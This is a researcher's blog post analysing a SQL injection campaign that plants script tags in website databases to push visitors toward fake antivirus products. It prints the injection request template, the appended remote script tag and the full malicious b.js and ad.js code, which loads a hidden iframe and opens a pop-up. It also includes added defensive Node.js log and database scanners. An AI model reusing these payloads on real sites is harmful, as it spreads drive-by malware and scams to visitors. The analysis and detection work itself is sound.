I was talking yesterday with a fellow researcher about the Win32/Danmec trojan and the way it uses SQL injection to extend its bot network when I just realized that I was actually looking through some of the injected webpages. I decided to find more about it so I backtracked the events to see how the injection occurs and where it may potentially lead. This is what I discovered, in short.

Everything starts with attacks against web servers, searching for victims. This is done by running queries like:

http://www.targetedwebserver.com/page.asp?arg=val; DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445... %20AS%20VARCHAR(4000));EXEC(@S);-

What this actually does is un-cast the hex-encoded payload (the payload is hidden this way to prevent Intrusion Detection Systems from detecting anything) and execute an SQL query that loops through all user tables and all ntext, text, nvarchar and varchar columns, appending to each of them a tiny piece of HTML code that looks like this:

<script src=http://domain1/b.js></script>
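The request above is what a web server sees in its logs, so a defender's first job is to pick such lines out and read the hidden payload. The following Node.js script is an added example, not code from the original post: it URL-decodes each log line, matches the DECLARE/SET/CAST/EXEC shape, and decodes the hex the way SQL Server would (single-byte characters for VARCHAR, UTF-16LE for NVARCHAR). The log lines and the hex payload are constructed; the decoded text is a harmless "SELECT 1".

```javascript
// Added example (not the blog post's code): flag web-server log lines that carry the
// "DECLARE @S ... SET @S=CAST(0x... AS VARCHAR) ... EXEC(@S)" injection and decode the
// hex so the hidden SQL can be read. Log lines and the hex payload are constructed.

// Requests arrive URL-encoded (%20 for spaces); decode before matching.
function urlDecode(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, ' '));
  } catch (e) {
    return s.replace(/%20/gi, ' '); // malformed escapes: fall back to the common case
  }
}

// DECLARE @v [N]VARCHAR(n); SET @v=CAST(0x<hex> AS [N]VARCHAR(n)); EXEC(@v)
const CAST_EXEC_RE =
  /DECLARE\s+@(\w+)\s+N?VARCHAR\s*\(\s*\d+\s*\)\s*;\s*SET\s+@\1\s*=\s*CAST\s*\(\s*0x([0-9a-f]+)\s+AS\s+(N?VARCHAR)\s*\(\s*\d+\s*\)\s*\)\s*;\s*EXEC\s*\(\s*@\1\s*\)/i;

// SQL Server reads the bytes as single-byte chars for VARCHAR and as UTF-16LE for NVARCHAR.
function decodeHexPayload(hex, targetType) {
  const encoding = targetType.toUpperCase() === 'NVARCHAR' ? 'utf16le' : 'latin1';
  return Buffer.from(hex, 'hex').toString(encoding);
}

// Returns null for a clean line, or the variable name, cast type and decoded SQL.
function analyzeLogLine(line) {
  const m = CAST_EXEC_RE.exec(urlDecode(line));
  if (!m) return null;
  return {
    variable: '@' + m[1],
    targetType: m[3].toUpperCase(),
    payloadSql: decodeHexPayload(m[2], m[3]),
  };
}

// Scan a whole log; each hit keeps its 1-based line number for follow-up.
function scanLog(lines) {
  const hits = [];
  lines.forEach((line, i) => {
    const r = analyzeLogLine(line);
    if (r) hits.push({ lineNo: i + 1, ...r });
  });
  return hits;
}

// Constructed IIS-style log lines: one clean request, one VARCHAR and one NVARCHAR injection.
// 0x53454C4543542031 is "SELECT 1"; the NVARCHAR variant is the same text in UTF-16LE.
const SAMPLE_LOG = [
  '2008-06-24 10:11:12 GET /page.asp arg=val 200',
  '2008-06-24 10:11:13 GET /page.asp arg=val;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x53454C4543542031%20AS%20VARCHAR(4000));EXEC(@S);-- 200',
  '2008-06-24 10:11:14 GET /page.asp arg=val;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x530045004C0045004300540020003100%20AS%20NVARCHAR(4000));EXEC(@S);-- 200',
];

console.log(scanLog(SAMPLE_LOG));
```

Run it with `node` over an exported log to list every injected request with its decoded SQL. Matching on the decoded form rather than on raw `%20` sequences matters, because the same payload can be sent with spaces, `+` or mixed-case escapes and still execute.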

I was curious to see what a live search for ";DECLARE%20@S%20" would reveal. Well, you can check it out for yourself and draw the appropriate conclusions (please notice that there are 9,010 results, which may not all be related to what I'm looking for, but it's safe to assume that many of them are):

Search results

By following the link to the .js file (most probably hosted on a botnet machine) I can show you its contents:

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatebng=");
// Acts only once per 12 hours per browser: the "updatebng" cookie marks a visit already served
if (start != -1){}else{
  var expires = new Date();
  expires.setTime(expires.getTime()+12*1*60*60*1000); // 12 hours
  document.cookie = "updatebng=update;expires="+expires.toGMTString();
  try{
    // zero-size iframe: the redirect page loads without anything visible to the user
    document.write("<iframe src=http://domain2/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
  }
  catch(e)
  {
  };
}

From the above I can see that an invisible iframe is added to the infected webpage. The iframe points to a malicious webpage that will either redirect to a page full of exploits that install more malware, or to http://domain/ad.js, which is the following:

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatead=");
// Same once-per-visit gating as b.js, this time with a 24-hour "updatead" cookie
if (start != -1){}else{
  var expires = new Date();
  expires.setTime(expires.getTime()+24*1*60*60*1000); // 24 hours
  document.cookie = "updatead=update;expires="+expires.toGMTString();
  try{
    // only English-language browsers get the pop-up
    if((navigator.userLanguage.toLowerCase() == "en-us")||(navigator.userLanguage.toLowerCase() == "en")) {
      w=window.open("hxxp: //domain.com?wmid=1041&l=14&it=1&s=4t","w","location=0,status=0,toolbar=0,menubar=0,directories=0,resizable=0,scrollbars=0,width=750,height=770");
      w.moveTo(0,0);
    }
  }
  catch(e)
  {
  };
}
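Cleaning up after this chain means finding two things: the `<script src=...></script>` tag that the injection appended to every text column, and the zero-size iframe that b.js writes into the served page. The Node.js script below is an added example, not code from the original post: it scans exported rows for the appended tag, strips it, and checks served HTML for hidden iframes. All sample data is constructed, and `domain1.example` / `domain2.example` stand in for the post's "domain1" and "domain2".

```javascript
// Added example (not the blog post's code): locate the <script src=...></script> tag
// appended to text columns and the zero-size iframe written by b.js, then strip the tag.
// Sample rows and HTML are constructed; the .example hosts are placeholders.

const INJECTED_SCRIPT_RE = /<script\s+src=["']?(https?:\/\/[^\s"'>]+\.js)["']?\s*>\s*<\/script>/gi;
const IFRAME_TAG_RE = /<iframe\b[^>]*\bsrc=["']?([^\s"'>]+)["']?[^>]*>/gi;

// The dropper iframe is made invisible with width=0 height=0 (see b.js above).
function isHiddenIframe(openingTag) {
  return /\bwidth=["']?0\b/i.test(openingTag) && /\bheight=["']?0\b/i.test(openingTag);
}

// Return the script URLs injected into one stored text value.
function findInjectedScripts(value) {
  return [...value.matchAll(INJECTED_SCRIPT_RE)].map((m) => m[1]);
}

// Return the src of every hidden iframe in a served HTML document.
function findHiddenIframes(html) {
  return [...html.matchAll(IFRAME_TAG_RE)]
    .filter((m) => isHiddenIframe(m[0]))
    .map((m) => m[1]);
}

// Walk exported rows ({table, column, id, value}) the way a DBA would after the
// incident; only rows carrying an injected tag are reported.
function scanRows(rows) {
  return rows
    .map((row) => ({
      table: row.table,
      column: row.column,
      id: row.id,
      scripts: findInjectedScripts(row.value),
    }))
    .filter((r) => r.scripts.length > 0);
}

// Cleanup: remove the appended tag; what remains is the original column value.
function stripInjectedScripts(value) {
  return value.replace(INJECTED_SCRIPT_RE, '');
}

// Constructed sample data.
const SAMPLE_ROWS = [
  { table: 'Products', column: 'Description', id: 1, value: 'Blue widget<script src=http://domain1.example/b.js></script>' },
  { table: 'Products', column: 'Description', id: 2, value: 'Red widget' },
  { table: 'News', column: 'Body', id: 7, value: 'Opening hours<script src=http://domain1.example/b.js></script>' },
];
const SAMPLE_HTML =
  '<html><body><p>Welcome</p>' +
  '<iframe src=http://domain2.example/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>' +
  '<iframe src="http://video.example/player" width="640" height="360"></iframe>' +
  '</body></html>';

console.log(scanRows(SAMPLE_ROWS));
console.log(findHiddenIframes(SAMPLE_HTML));
```

Two caveats when using this. The injection touched every ntext, text, nvarchar and varchar column in every user table, so the export you scan has to cover all of them, not just the columns that render on the home page. And because b.js and ad.js set 12-hour and 24-hour cookies before doing anything, a second fetch of a page from the same browser profile shows no iframe and no pop-up; reproduce with a fresh profile or the scan above, not by reloading.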

Now I have really arrived where I wanted to be. The above script will redirect the user to a page hosting the potentially unwanted antivirus software. From here on we are dealing with "potentially unwanted" security products. Yes, you've guessed it: the authors went to all this trouble to be able to advertise these so-called AV products. But this is not your regular ad, because what this page actually does is display a fake, rather elaborate, antivirus scan of the user's computer, and of course no security product is any good unless it detects some malware the user didn't know about. Just take a look at these snapshots:

Fake security UI

Fake security pop-up

Now, if the user is fooled by this, he will click on the page (just choose your favourite area, anything will do) and download an installer for this "potentially unwanted" product (be advised that the image above is not the genuine Security Center from Windows).

So, in case you were looking for another reason behind all these SQL injection attacks that you read about on everybody's blogs, besides password stealing and setting up botnets, you have it: to spread fake security applications, for which users pay a lot and receive virtually nothing.

Marian RADU

PS: Here are some resources on preventing these sorts of issues from impacting your website:

http://www.microsoft.com/technet/security/advisory/954462.mspx
http://blogs.technet.com/msrc/archive/2008/06/24/rise-in-sql-injection-attacks-exploiting-unverified-user-data-input.aspx
http://blogs.technet.com/swi/archive/2008/06/24/new-tools-to-block-and-eradicate-sql-injection.aspx